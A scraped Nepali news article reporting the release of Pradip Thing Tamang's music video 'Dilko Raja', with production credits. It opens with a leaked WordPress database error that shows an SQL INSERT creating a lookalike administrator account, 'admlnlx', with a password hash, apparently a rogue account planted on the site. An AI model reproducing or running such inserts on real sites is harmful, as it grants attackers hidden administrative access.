WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJV0bQrtB08og7IKAbQs7uxPsT9Orq1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:28:19', '', 'admlnlx', 'admlnlx')

ताम्सालिङ टिभिको प्रस्तुतीमा दिलको राजा आधुनिक म्युजीक भिडियो सार्वजनीक – Gaule Khabar

ताम्सालिङ टिभिको प्रस्तुतीमा दिलको राजा आधुनिक म्युजीक भिडियो सार्वजनीक

ताम्सालिङ टिभिको प्रस्तुतीमा प्रदिप थिङ तामाङको आधुनिक म्युजीक भिडियो दिलको राजा आज वौद्धमा एक कार्यक्रमका विच सार्वजनीक गरिएको छ ।

ताम्सालिङ टिभिको प्रस्तुतीमा दिलको राजा आधुनिक म्युजीक भिडियो सार्वजनीक

गाउले न्युज – काठमाडौं,  ताम्सालिङ टिभिको प्रस्तुतीमा प्रदिप थिङ तामाङको आधुनिक म्युजीक भिडियो दिलको राजा आज वौद्धमा एक कार्यक्रमका विच सार्वजनीक गरिएको छ ।

तामाङ सेलो सम्राट तथा वरिष्ठ गायक तथा संगीतकार चन्द्र कुमार मोक्तानको प्रमुख आतिथ्यतामा सम्पन्न उक्त कार्यक्रममा विशेष अतिथीका रुपमा तामाङ कलाकार संघका अध्यक्ष संजिव वाईवा तामाङ लगायत कलाकारहरु संगै पत्रकार मिडियाकर्मीहरुको वाक्लो उपस्थीती रहेको थियो ।

सार्वजनीक भिडियोमा प्रेममा संकाले ठुलो रुप लिदै निलम संग अभि रिसाईराको हुन्छ र आफ्नो मान्छेलाई फकाउने गीतको भाब रहेको छ । अन्तमा प्रदिप निलमको दाजु हो भन्ने थाहा भए पछि भने उनिहरुको मायाले निरन्तरता पाएका छन् । संकाले मायाको अन्त्य गर्न सक्छ त्येसैले संका गर्न हुन्न भन्ने संदेश यस म्युजीक भिडियोले दिन खोजेको पाईन्छ ।


मोडल तथा ताम्सालिङ टिभिका संस्थापक अध्यक्ष समेत रहनु भएका थिङका यस अघि सार्वजनीक भएका “रातो चोली” र “फीरफीर” अत्याधीक रुचाईएका म्युजीक भिडियोहरु हुन् । तामाङ सेलो संगै अवका दिनमा आधुनीक गीतमा पनि पाईला चालेका थिङको यो गीतले कतिको दर्शकको माया पाउने हो त्यो भने हेर्न बाँकी रहेको छ ।

सार्वजनीक भएको गीतमा प्रदीप थिङ तामाङकै शब्द तथा निमा दोङ र जीतु लोप्चनको आवाज रहेको छ । निरोज लामाको एरेन्ज रहेको यस गीतलाई दिपेश प्रधानले मिक्सिङ गर्नु भएको छ । सघु प्रोडक्सनको स्टुडियोमा प्रयास दोङले यो गीत रेकर्ड गर्नु भएको हो ।

यस गितको म्युजिक भिडियोमा सुर्य लामाको सम्पादन, छायंकन, कलरिङ, सिनेमाटोग्रफी तथा निर्देशन रहेको छ भने नायक तथा मोडल अभि लामाको कोरियोग्रफी तथा अभि लामा र मोडल निलम मोक्तानको प्रमुख अभिनय रहेको छ । यस म्युजीक भिडियोलाई जिग्मे मिडियाले पोष्ट प्रोडक्सन संगै बब्लु गुरुङ प्रोडक्सन म्यानेजर रहनु भएको छ । यो म्युजीक भिडियो आजै मात्र जिग्मे मिडियाको अफिसियल युट्युव च्यानल मार्फत सार्वजनीक गरिएको छ ।

भिडियो हेर्न तलको लिन्क्मा क्लिक गर्नु होला ।

https://www.youtube.com/channel/UCBI86hKRVKrCmZXAS-fTcPA

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका